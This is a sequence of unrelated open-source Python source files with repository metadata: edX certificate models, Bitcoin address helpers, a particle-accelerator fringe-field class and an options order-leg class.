error_reason = models.CharField(max_length=512, blank=True, default='')
class Meta:
unique_together = (('user', 'course_id'),)
@classmethod
def certificate_for_student(cls, student, course_id):
"""
This returns the certificate for a student for a particular course
        or None if no such certificate exists.
"""
try:
return cls.objects.get(user=student, course_id=course_id)
except cls.DoesNotExist:
pass
return None
@receiver(post_save, sender=GeneratedCertificate)
def handle_post_cert_generated(sender, instance, **kwargs): # pylint: disable=no-self-argument, unused-argument
"""
Handles post_save signal of GeneratedCertificate, and mark user collected
course milestone entry if user has passed the course
or certificate status is 'generating'.
"""
if settings.FEATURES.get('ENABLE_PREREQUISITE_COURSES') and instance.status == CertificateStatuses.generating:
fulfill_course_milestone(instance.course_id, instance.user)
def certificate_status_for_student(student, course_id):
'''
This returns a dictionary with a key for status, and other information.
The status is one of the following:
unavailable - No entry for this student--if they are actually in
the course, they probably have not been graded for
certificate generation yet.
generating - A request has been made to generate a certificate,
but it has not been generated yet.
regenerating - A request has been made to regenerate a certificate,
but it has not been generated yet.
deleting - A request has been made to delete a certificate.
deleted - The certificate has been deleted.
downloadable - The certificate is available for download.
notpassing - The student was graded but is not passing
restricted - The student is on the restricted embargo list and
should not be issued a certificate. This will
be set if allow_certificate is set to False in
the userprofile table
If the status is "downloadable", the dictionary also contains
"download_url".
If the student has been graded, the dictionary also contains their
grade for the course with the key "grade".
'''
try:
generated_certificate = GeneratedCertificate.objects.get(
user=student, course_id=course_id)
d = {'status': generated_certificate.status,
'mode': generated_certificate.mode}
if generated_certificate.grade:
d['grade'] = generated_certificate.grade
if generated_certificate.status == CertificateStatuses.downloadable:
d['download_url'] = generated_certificate.download_url
return d
except GeneratedCertificate.DoesNotExist:
pass
return {'status': CertificateStatuses.unavailable, 'mode': GeneratedCertificate.MODES.honor}
class ExampleCertificateSet(TimeStampedModel):
"""A set of example certificates.
Example certificates are used to verify that certificate
generation is working for a particular course.
A particular course may have several kinds of certificates
(e.g. honor and verified), in which case we generate
multiple example certificates for the course.
"""
course_key = CourseKeyField(max_length=255, db_index=True)
class Meta: # pylint: disable=missing-docstring, old-style-class
get_latest_by = 'created'
@classmethod
@transaction.commit_on_success
def create_example_set(cls, course_key):
"""Create a set of example certificates for a course.
Arguments:
course_key (CourseKey)
Returns:
ExampleCertificateSet
"""
cert_set = cls.objects.create(course_key=course_key)
ExampleCertificate.objects.bulk_create([
ExampleCertificate(
example_cert_set=cert_set,
description=mode.slug,
template=cls._template_for_mode(mode.slug, course_key)
)
for mode in CourseMode.modes_for_course(course_key)
])
return cert_set
@classmethod
def latest_status(cls, course_key):
"""Summarize the latest status of example certificates for a course.
Arguments:
course_key (CourseKey)
Returns:
list: List of status dictionaries. If no example certificates
have been started yet, returns None.
"""
try:
latest = cls.objects.filter(course_key=course_key).latest()
except cls.DoesNotExist:
return None
queryset = ExampleCertificate.objects.filter(example_cert_set=latest).order_by('-created')
return [cert.status_dict for cert in queryset]
def __iter__(self):
"""Iterate through example certificates in the set.
Yields:
ExampleCertificate
"""
queryset = (ExampleCertificate.objects).select_related('example_cert_set').filter(example_cert_set=self)
for cert in queryset:
yield cert
@staticmethod
def _template_for_mode(mode_slug, course_key):
"""Calculate the template PDF based on the course mode. """
return (
u"certificate-template-{key.org}-{key.course}-verified.pdf".format(key=course_key)
if mode_slug == 'verified'
else u"certificate-template-{key.org}-{key.course}.pdf".format(key=course_key)
)
def _make_uuid():
"""Return a 32-character UUID. """
return uuid.uuid4().hex
class ExampleCertificate(TimeStampedModel):
"""Example certificate.
Example certificates are used to verify that certificate
generation is working for a particular course.
An example certificate is similar to an ordinary certificate,
except that:
1) Example certificates are not associated with a particular user,
and are never displayed to students.
2) We store the "inputs" for generating the example certificate
to make it easier to debug when certificate generation fails.
3) We use dummy values.
"""
# Statuses
STATUS_STARTED = 'started'
STATUS_SUCCESS = 'success'
STATUS_ERROR = 'error'
# Dummy full name for the generated certificate
EXAMPLE_FULL_NAME = u'John Doë'
example_cert_set = models.ForeignKey(ExampleCertificateSet)
description = models.CharField(
max_length=255,
help_text=ugettext_lazy(
u"A human-readable description of the example certificate. "
u"For example, 'verified' or 'honor' to differentiate between "
u"two types of certificates."
)
)
# Inputs to certificate generation
# We store this for auditing purposes if certificate
# generation fails.
uuid = models.CharField(
max_length=255,
default=_make_uuid,
db_index=True,
unique=True,
help_text=ugettext_lazy(
u"A unique identifier for the example certificate. "
u"This is used when we receive a response from the queue "
u"to determine which example certificate was processed."
)
)
access_key = models.CharField(
max_length=255,
default=_make_uuid,
db_index=True,
help_text=ugettext_lazy(
u"An access key for the example certificate. "
u"This is used when we receive a response from the queue "
u"to validate that the sender is the same entity we asked "
u"to generate the certificate."
)
)
full_name = models.CharField(
max_length=255,
default=EXAMPLE_FULL_NAME,
help_text=ugettext_lazy(u"The full name that will appear on the certificate.")
)
template = models.CharField(
max_length=255,
help_text=ugettext_lazy(u"The template file to use when generating the certificate.")
)
# Outputs from certificate generation
status = models.CharField(
max_length=255,
default=STATUS_STARTED,
choices=(
(STATUS_STARTED, 'Started'),
(STATUS_SUCCESS, 'Success'),
(STATUS_ERROR, 'Error')
),
help_text=ugettext_lazy(u"The status of the example certificate.")
)
error_reason = models.TextField(
null=True,
default=None,
help_text=ugettext_lazy(u"The reason an error occurred during certificate generation.")
)
download_url = models.CharField(
max_length=255,
null=True,
default=None,
help_text=ugettext_lazy(u"The download URL for the generated certificate.")
)
def update_status(self, status, error_reason=None, download_url=None):
"""Update the status of the example certificate.
This will usually be called either:
1) When an error occurs adding the certificate to the queue.
        2) When we receive a response from the queue (either error or success).
If an error occurs, we store the error message;
if certificate generation is successful, we store the URL
for the generated certificate.
Arguments:
status (str): Either `STATUS_SUCCESS` or `STATUS_ERROR`
Keyword Arguments:
error_reason (unicode): A description of the error that occurred.
download_url (unicode): The URL for the generated certificate.
Raises:
ValueError: The status is not a valid value.
"""
if status not in [self.STATUS_SUCCESS, self.STATUS_ERROR]:
msg = u"Invalid status: must be either '{success}' or '{error}'.".format(
success=self.STATUS_SUCCESS,
error=self.STATUS_ERROR
)
raise ValueError(msg)
self.status = status
if status == self.STATUS_ERROR and error_reason:
self.error_reason = error_reason
if status == self.STATUS_SUCCESS and download_url:
self.download_url = download_url
self.save()
@property
def status_dict(self):
"""Summarize the status of the example certificate.
Returns:
dict
"""
result = {
'description': self.description,
'status': self.status,
}
if self.error_reason:
result['error_reason'] = self.error_reason
if self.download_url:
result['download_url'] = self.download_url
return result
@property
def course_key(self):
"""The course key associated with the example certificate. """
return self.example_cert_set.course_key
class CertificateGenerationCourseSetting(TimeStampedModel):
"""Enable or disable certificate generation for a particular course.
This controls whether students are allowed to "self-generate"
certificates for a course. It does NOT prevent us from
batch-generating certificates for a course using management
commands.
In general, we should only enable self-generated certificates
for a course once we successfully generate example certificates
for the course. This is enforced in the UI layer, but
not in the data layer.
"""
course_key = CourseKeyField(max_length=255, db_index=True)
enabled = models.BooleanField(default=False)
class Meta: # pylint: disable=missing-docstring, old-style-class
get_latest_by = 'created'
@classmethod
def is_enabled_for_course(cls, course_key):
"""Check whether self-generated certificates are enabled for a course.
Arguments:
course_key (CourseKey): The identifier for the course.
Returns:
boolean
"""
try:
latest = cls.objects.filter(course_key=course_key).latest()
except cls.DoesNotExist:
return False
else:
return latest.enabled
@classmethod
def set_enabled_for_course(cls, course_key, is_enabled):
"""Enable or disable self-generated certificates for a course.
Arguments:
course_key (CourseKey): The identifier for the course.
is_enabled (boolean): Whether to enable or disable self-generated certificates.
"""
CertificateGenerationCourseSetting.objects.create(
course_key=course_key,
enabled=is_enabled
)
class CertificateGenerationConfiguration(ConfigurationModel):
"""Configure certificate generation.
Enable or disable the self-generated certificates feature.
When this flag is disabled, the "generate certificate" button
will be hidden on the progress page.
When the feature is enabled, the "generate certificate" button
will appear for courses that have enabled self-generated
certificates.
"""
pass
|
jazkarta/edx-platform-for-isc
|
lms/djangoapps/certificates/models.py
|
Python
|
agpl-3.0
| 17,158 | 0.000816 |
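The module docstring's state diagram can be read as a small transition table. The sketch below (hypothetical, not part of the source) restates it in plain Python using the CertificateStatuses class defined above; the source states for del_cert are not labelled in the diagram, so the (error, downloadable) pair there is an assumption.

# Hypothetical restatement of the docstring's state diagram.
CS = CertificateStatuses
TRANSITIONS = {
    'add_cert':   {'from': (CS.deleted, CS.error, CS.unavailable),
                   'pending': CS.generating,   'done': CS.downloadable},
    'regen_cert': {'from': (CS.error, CS.downloadable),
                   'pending': CS.regenerating, 'done': CS.downloadable},
    'del_cert':   {'from': (CS.error, CS.downloadable),  # assumed sources
                   'pending': CS.deleting,     'done': CS.deleted},
}
# Any pending state may instead end in CS.error if certificate work fails.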
#!/usr/bin/env python
import binascii
import hashlib
from reversecoin.bitcoin.key import CKey as Key
from reversecoin.bitcoin.base58 import encode, decode
def myhash(s):
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def myhash160(s):
h = hashlib.new('ripemd160')
h.update(hashlib.sha256(s).digest())
return h.digest()
def getnewaddress():
# Generate public and private keys
key = Key()
key.generate()
key.set_compressed(True)
private_key = key.get_privkey()
public_key = key.get_pubkey()
private_key_hex = private_key.encode('hex')
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
# Convert the result from a byte string into a base58 string using Base58Check encoding.
address = encode(binary_address)
return public_key, private_key, address
def public_key_to_address(public_key):
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
def public_key_hex_to_address(public_key_hex):
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
# fix this
def address_to_public_key_hash(address):
binary_address = decode(address)
# remove the 4 checksum bytes
extended_address = binary_address[:-4]
# remove version byte: 0x00 for Main Network
hash160_address = extended_address[1:]
return hash160_address
def public_key_hex_to_pay_to_script_hash(public_key_hex):
script = "41" + public_key_hex + "AC"
return binascii.unhexlify(script)
def address_to_pay_to_pubkey_hash(address):
print "Not implemented >>>>>>>>>>>>>>>>>>>"
exit(0)
def output_script_to_public_key_hash(script):
script_key_hash = binascii.hexlify(myhash160(bytearray.fromhex(binascii.hexlify(script[1:-1]))))
return script_key_hash
def address_to_output_script(address):
pass
if __name__ == "__main__":
address1 = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM"
address2 = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
public_key_hex1 = "0450863AD64A87AE8A2FE83C1AF1A8403CB53F53E486D8511DAD8A04887E5B23522CD470243453A299FA9E77237716103ABC11A1DF38855ED6F2EE187E9C582BA6"
public_key_hex2 = "04678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5f"
print "address: ", address1
print "public key_hex: ", public_key_hex1
#print "public_keys_hex: ", public_key_hex1, public_key_hex2
print "public key to address: ", public_key_hex_to_address(public_key_hex1)
print "address to public key hash: ", binascii.hexlify(address_to_public_key_hash(address1))
# print "public key hash: ", binascii.hexlify(myhash160(bytearray.fromhex(public_key_hex1)))
|
obulpathi/reversecoin
|
reversecoin/bitcoin/utils.py
|
Python
|
gpl-2.0
| 4,697 | 0.004897 |
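A dependency-free sketch (an illustration, not from the source) of the same Base58Check pipeline the helpers above implement, useful for checking the version-byte and checksum steps by hand; the alphabet below is the standard Bitcoin base58 alphabet.

# Hypothetical standalone walk-through (Python 2, matching the file) of the
# hash160 -> address steps above, using only hashlib.
import hashlib

ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'

def b58encode(raw):
    n = int(raw.encode('hex'), 16)
    out = ''
    while n > 0:
        n, r = divmod(n, 58)
        out = ALPHABET[r] + out
    # every leading zero byte is encoded as a leading '1'
    pad = len(raw) - len(raw.lstrip('\x00'))
    return '1' * pad + out

def hash160_to_address(h160):
    ext = '\x00' + h160                  # version byte for the main network
    checksum = hashlib.sha256(hashlib.sha256(ext).digest()).digest()[:4]
    return b58encode(ext + checksum)

# Round-trip check against the helpers above (hypothetical usage):
#   public_key, private_key, address = getnewaddress()
#   assert hash160_to_address(address_to_public_key_hash(address)) == address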
from pseudoregion import *
class Edge(PseudoRegion):
"""EDGE Fringe field and other kicks for hard-edged field models
1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by factor 1/(1+delta)
p4: if not 0 ==> apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole (DIP), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg's HRDEND routine to find the change in transverse
position and transverse momentum due to the fringe field.
"""
def __init__(
self,
edge_type,
model,
model_parameters_list,
name=None,
metadata=None):
PseudoRegion.__init__(self, name, metadata)
self.edge_type = edge_type
self.model = model
        self.model_parameters = model_parameters_list
class Edge(Field):
"""
EDGE
1) edge type (A4) {SOL, DIP, HDIP,DIP3,QUAD,SQUA,SEX, BSOL,FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by the factor 1 / (1+δ)
p4: if not 0 => apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole ( DIP ), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg’s HRDEND routine to find the change in
transverse position and transverse momentum due to the fringe field.
"""
begtag = 'EDGE'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 6,
'for001_format': {
'line_splits': [
1,
5]}},
'sol': {
'desc': 'Solenoid',
'doc': '',
'icool_model_name': 'SOL',
'parms': {
'model': {
'pos': 1,
'type': 'String',
'doc': ''},
'bs': {
'pos': 3,
'type': 'Real',
'doc': 'p1: BS [T] '
'If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the '
'exit edge. (You can use this to get a tapered field profile)'}}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'EDGE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'EDGE':
object.__setattr__(self, name, value)
            else:
                raise ValueError('Illegal attempt to set incorrect ftag.')
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
|
jon2718/ipycool_2.0
|
edge.py
|
Python
|
mit
| 4,743 | 0.002321 |
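A purely illustrative sketch (values are hypothetical) of the SOL sign convention spelled out in the docstrings above, kept as plain data since the file defines Edge twice and the second definition shadows the first:

# Hypothetical parameter sets for a 2 T main solenoid, following the
# docstring convention: p1 = -B on the entrance edge, p1 = +B on the exit.
B = 2.0  # main solenoid field [T]
entrance_edge = ('SOL', 1, [-B, 0.0, 0.0, 0.0])
exit_edge     = ('SOL', 1, [+B, 0.0, 0.0, 0.0])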
from kaleidoscope.globals import SecType
class OrderLeg(object):
def __init__(self, quantity, contract):
"""
This class is an abstraction of an order leg of an option strategy. It holds the information
for a single order leg as part of an entire option strategy.
"""
self.quantity = quantity
self.contract = contract
def reverse(self):
""" reverse the the position by negating the quantity """
self.quantity *= -1
class OptionLeg(OrderLeg):
""" Holds information of an option leg """
def __init__(self, option, quantity):
self.sec_type = SecType.OPT
super().__init__(quantity, option)
class StockLeg(OrderLeg):
""" Holds information of an stock leg """
def __init__(self, symbol, quantity):
self.sec_type = SecType.STK
super().__init__(quantity, symbol)
|
michaelchu/kaleidoscope
|
kaleidoscope/options/order_leg.py
|
Python
|
mit
| 884 | 0.001131 |
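A short usage sketch (the contract objects are placeholders, not from the source): the leg classes above store whatever contract object they are given, so plain strings stand in here for real option and stock contracts.

# Hypothetical usage: build a one-lot covered call, then reverse it to close.
call = OptionLeg('SPX 2017-06-16 2400 C', quantity=-1)  # short one call
stock = StockLeg('SPX', quantity=100)                   # long the underlying

for leg in (call, stock):
    leg.reverse()  # negate quantities to close the position

print(call.quantity, stock.quantity)  # 1, -100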